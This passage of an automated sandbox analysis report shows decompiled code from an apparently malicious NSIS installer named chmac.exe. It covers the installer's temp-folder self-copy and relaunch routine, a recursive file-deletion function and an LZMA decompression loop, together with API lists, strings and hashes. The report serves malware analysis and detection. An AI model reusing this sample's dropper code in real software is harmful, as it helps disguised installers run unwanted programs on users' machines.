									if(_t113 == 0) {
										L31:
										 *0x423f4c =  *0x423f4c | 0xffffffff;
										_v400 = E004035E3();
										goto L32;
									}
									_t103 = E004055A3(_t96, 0);
									while(_t103 >= _t96) {
										__eflags =  *_t103 - 0x3d3f5f20;
										if(__eflags == 0) {
											break;
										}
										_t103 = _t103 - 1;
										__eflags = _t103;
									}
									_t115 = _t103 - _t96;
									_v408 = "Error launching installer";
									if(_t103 < _t96) {
										lstrcatA(_t105, "~nsu.tmp");
										_t101 = "C:\\Users\\hardz\\AppData\\Roaming\\dihsw";
										if(lstrcmpiA(_t105, "C:\\Users\\hardz\\AppData\\Roaming\\dihsw") == 0) {
											goto L32;
										}
										CreateDirectoryA(_t105, 0);
										SetCurrentDirectoryA(_t105);
										_t120 = "C:\\Users\\hardz\\AppData\\Local\\Temp"; // 0x43
										if(_t120 == 0) {
											E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t101);
										}
										E00405A85(0x424000, _v396);
										 *0x424400 = 0x41;
										_t98 = 0x1a;
										do {
											_t71 =  *0x423eb0; // 0x80f8a0
											_t22 = _t71 + 0x120; // 0xffffffff
											E00405AA7(0, _t98, 0x41f050, 0x41f050,  *_t22);
											DeleteFileA(0x41f050);
											if(_v416 != 0 && CopyFileA("C:\\Users\\hardz\\AppData\\Roaming\\dihsw\\chmac.exe", 0x41f050, 1) != 0) {
												_push(0);
												_push(0x41f050);
												E004057D3();
												_t77 =  *0x423eb0; // 0x80f8a0
												_t24 = _t77 + 0x124; // 0xffffffff
												E00405AA7(0, _t98, 0x41f050, 0x41f050,  *_t24);
												_t79 = E004052E5(0x41f050);
												if(_t79 != 0) {
													CloseHandle(_t79);
													_v416 = 0;
												}
											}
											 *0x424400 =  *0x424400 + 1;
											_t98 = _t98 - 1;
										} while (_t98 != 0);
										_push(0);
										_push(_t105);
										E004057D3();
										goto L32;
									}
									 *_t103 = 0;
									_t104 = _t103 + 4;
									if(E00405659(_t115, _t103 + 4) == 0) {
										goto L32;
									}
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									E00405A85("C:\\Users\\hardz\\AppData\\Local\\Temp", _t104);
									_v424 = 0;
									goto L31;
								}
								GetWindowsDirectoryA(_t105, 0x3fb);
								lstrcatA(_t105, "\\Temp");
								_t89 = E004031F1(_t110);
								_t111 = _t89;
								if(_t89 == 0) {
									goto L32;
								}
								goto L22;
							}
							goto L15;
						}
					} else {
						goto L4;
					}
					do {
						L4:
						_t44 = _t44 + 1;
						__eflags =  *_t44 - 0x20;
					} while ( *_t44 == 0x20);
					goto L5;
				}
				goto L20;
			}

0x00403231
0x00403235
0x0040323d
0x0040323f
0x00403244
0x0040324f
0x00403256
0x0040325e
0x00403268
0x0040327e
0x0040328e
0x00403293
0x00403299
0x004032a0
0x004032b3
0x004032b8
0x004032ba
0x004032bc
0x004032c1
0x004032c1
0x004032d1
0x004032d7
0x00403340
0x00403340
0x00403342
0x00403344
0x00000000
0x00000000
0x004032dd
0x004032e0
0x004032e8
0x004032e8
0x004032eb
0x004032f0
0x004032f2
0x004032f2
0x004032f3
0x004032f3
0x004032f8
0x004032fb
0x00403330
0x00403335
0x0040333a
0x0040333d
0x0040333f
0x0040333f
0x0040333f
0x00000000
0x004032fd
0x004032fd
0x004032fe
0x00403301
0x00403309
0x0040330c
0x0040330e
0x0040330e
0x0040330e
0x0040330c
0x00403311
0x00403317
0x0040331f
0x00403322
0x00403324
0x00403324
0x00403324
0x00403322
0x00403327
0x0040332e
0x00403348
0x0040334b
0x0040334b
0x00403354
0x00403359
0x00403359
0x00403364
0x0040336a
0x0040336f
0x00403371
0x00403393
0x00403398
0x0040339f
0x004033a6
0x004033aa
0x00403411
0x00403411
0x00403416
0x00403420
0x0040350b
0x00403511
0x0040351c
0x00403525
0x00403527
0x0040352c
0x0040352e
0x00403530
0x00403532
0x00403534
0x00403536
0x00403538
0x00403548
0x0040354a
0x0040354c
0x00403559
0x00403568
0x00403570
0x00403578
0x00403578
0x0040354c
0x00403538
0x00403534
0x0040357d
0x00403583
0x00403585
0x00403589
0x00403589
0x00403585
0x0040358e
0x00403593
0x00403596
0x00403598
0x00403598
0x004035a0
0x004035a0
0x0040342f
0x00403436
0x00403436
0x004033ac
0x004033b2
0x00403401
0x00403401
0x0040340d
0x00000000
0x0040340d
0x004033bb
0x004033c8
0x004033bf
0x004033c5
0x00000000
0x00000000
0x004033c7
0x004033c7
0x004033c7
0x004033cc
0x004033ce
0x004033d6
0x00403442
0x00403447
0x00403456
0x00000000
0x00000000
0x0040345a
0x00403461
0x00403467
0x0040346d
0x00403475
0x00403475
0x00403483
0x0040348a
0x00403493
0x00403499
0x00403499
0x0040349e
0x004034a5
0x004034ab
0x004034b5
0x004034c9
0x004034ca
0x004034cb
0x004034d0
0x004034d5
0x004034dc
0x004034e2
0x004034e9
0x004034ec
0x004034f2
0x004034f2
0x004034e9
0x004034f6
0x004034fc
0x004034fc
0x004034ff
0x00403500
0x00403501
0x00000000
0x00403501
0x004033d8
0x004033da
0x004033e5
0x00000000
0x00000000
0x004033ed
0x004033f8
0x004033fd
0x00000000
0x004033fd
0x00403379
0x00403385
0x0040338a
0x0040338f
0x00403391
0x00000000
0x00000000
0x00000000
0x00403391
0x00000000
0x0040332e
0x00000000
0x00000000
0x00000000
0x004032e2
0x004032e2
0x004032e2
0x004032e3
0x004032e3
0x00000000
0x004032e2
0x00000000

APIs

#17.COMCTL32 ref: 00403244
SetErrorMode.KERNELBASE(00008001), ref: 0040324F
OleInitialize.OLE32(00000000), ref: 00403256

Part of subcall function 00405DA3: GetModuleHandleA.KERNEL32(?,?,00000000,00403268,00000008), ref: 00405DB5
Part of subcall function 00405DA3: LoadLibraryA.KERNELBASE(?,?,00000000,00403268,00000008), ref: 00405DC0
Part of subcall function 00405DA3: GetProcAddress.KERNEL32(00000000,?), ref: 00405DD1

SHGetFileInfoA.SHELL32(0041F450,00000000,?,00000160,00000000,00000008), ref: 0040327E

Part of subcall function 00405A85: lstrcpynA.KERNEL32(?,?,00000400,00403293,rrvbrezgsbt Setup,NSIS Error), ref: 00405A92

GetCommandLineA.KERNEL32(rrvbrezgsbt Setup,NSIS Error), ref: 00403293
GetModuleHandleA.KERNEL32(00000000,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000), ref: 004032A6
CharNextA.USER32(00000000,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000020), ref: 004032D1
GetTempPathA.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\,00000000,00000020), ref: 00403364
GetWindowsDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 00403379
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403385
DeleteFileA.KERNELBASE(1033), ref: 00403398
OleUninitialize.OLE32(00000000), ref: 00403416
ExitProcess.KERNEL32 ref: 00403436
lstrcatA.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000,00000000), ref: 00403442
lstrcmpiA.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Roaming\dihsw,C:\Users\user\AppData\Local\Temp\,~nsu.tmp,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,00000000,00000000), ref: 0040344E
CreateDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\,00000000), ref: 0040345A
SetCurrentDirectoryA.KERNEL32(C:\Users\user\AppData\Local\Temp\), ref: 00403461
DeleteFileA.KERNEL32(0041F050,0041F050,FFFFFFFF,00424000,?), ref: 004034AB
CopyFileA.KERNEL32(C:\Users\user\AppData\Roaming\dihsw\chmac.exe,0041F050,00000001), ref: 004034BF
CloseHandle.KERNEL32(00000000,0041F050,0041F050,FFFFFFFF,0041F050,00000000), ref: 004034EC
GetCurrentProcess.KERNEL32(00000028,?,00000005,00000004,00000003), ref: 00403541
ExitWindowsEx.USER32(00000002,00000000), ref: 0040357D
ExitProcess.KERNEL32 ref: 004035A0

Strings

", xrefs: 004032F3
_?=, xrefs: 004033BF
C:\Users\user\AppData\Local\Temp\, xrefs: 00403359, 0040335E, 00403378, 00403384, 00403441, 0040344D, 00403459, 00403460, 00403500
~nsu.tmp, xrefs: 0040343C
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 00403299, 0040329F, 004033B5
\Temp, xrefs: 0040337F
C:\Users\user\AppData\Local\Temp, xrefs: 004033F3
C:\Users\user\AppData\Local\Temp, xrefs: 0040334F, 004033E8, 00403467, 00403470
C:\Users\user\AppData\Roaming\dihsw, xrefs: 00403447, 0040344C, 0040346F
NSIS Error, xrefs: 00403284
Error writing temporary file. Make sure your temp folder is valid., xrefs: 00403235
Error launching installer, xrefs: 004033CE
rrvbrezgsbt Setup, xrefs: 00403289
NCRC, xrefs: 00403311
1033, xrefs: 00403393
C:\Users\user\AppData\Roaming\dihsw\chmac.exe, xrefs: 004034BA
SeShutdownPrivilege, xrefs: 00403553
/D=, xrefs: 00403327

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: File$DirectoryExitHandleProcess$CurrentDeleteModuleWindowslstrcat$AddressCharCloseCommandCopyCreateErrorInfoInitializeLibraryLineLoadModeNextPathProcTempUninitializelstrcmpilstrcpyn
String ID: /D=$ _?=$"$"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $1033$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\dihsw$C:\Users\user\AppData\Roaming\dihsw\chmac.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$NCRC$NSIS Error$SeShutdownPrivilege$\Temp$rrvbrezgsbt Setup$~nsu.tmp
API String ID: 2278157092-343552719
Opcode ID: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction ID: b5e3cabad0cbadbc416d8838d891dc98190303aa4ff7e7c7b73425e0a697763a
Opcode Fuzzy Hash: 4ff487119c06dda8d8e147d0b706826c2d263d435ab01cad5a4ff4f20c9e225b
Instruction Fuzzy Hash: FF91C170A08351BED7216F619C89B2B7EACAB44306F04457BF941B62D2C77C9E058B6E

Uniqueness

Uniqueness Score: -1.00%

Function 004053AA, Relevance: 21.2, APIs: 9, Strings: 3, Instructions: 156
filestringCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 94%

			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

APIs

DeleteFileA.KERNELBASE(?,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 004053C8
lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405412
lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405433
lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 00405439
FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" ,74E5F560), ref: 0040544A
FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
FindClose.KERNEL32(?), ref: 0040550D

Strings

\*.*, xrefs: 0040540C
C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
"C:\Users\user\AppData\Roaming\dihsw\chmac.exe" , xrefs: 004053B4

Memory Dump Source

Source File: 0000000D.00000002.325762137.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000D.00000002.325742085.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325820152.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325847713.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325917047.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325923655.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000D.00000002.325943343.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.325958429.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000D.00000002.326160319.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_13_2_400000_chmac.jbxd

Similarity

API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
String ID: "C:\Users\user\AppData\Roaming\dihsw\chmac.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
API String ID: 2035342205-3020306546
Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E

Uniqueness

Uniqueness Score: -1.00%

Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382
COMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 98%

			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
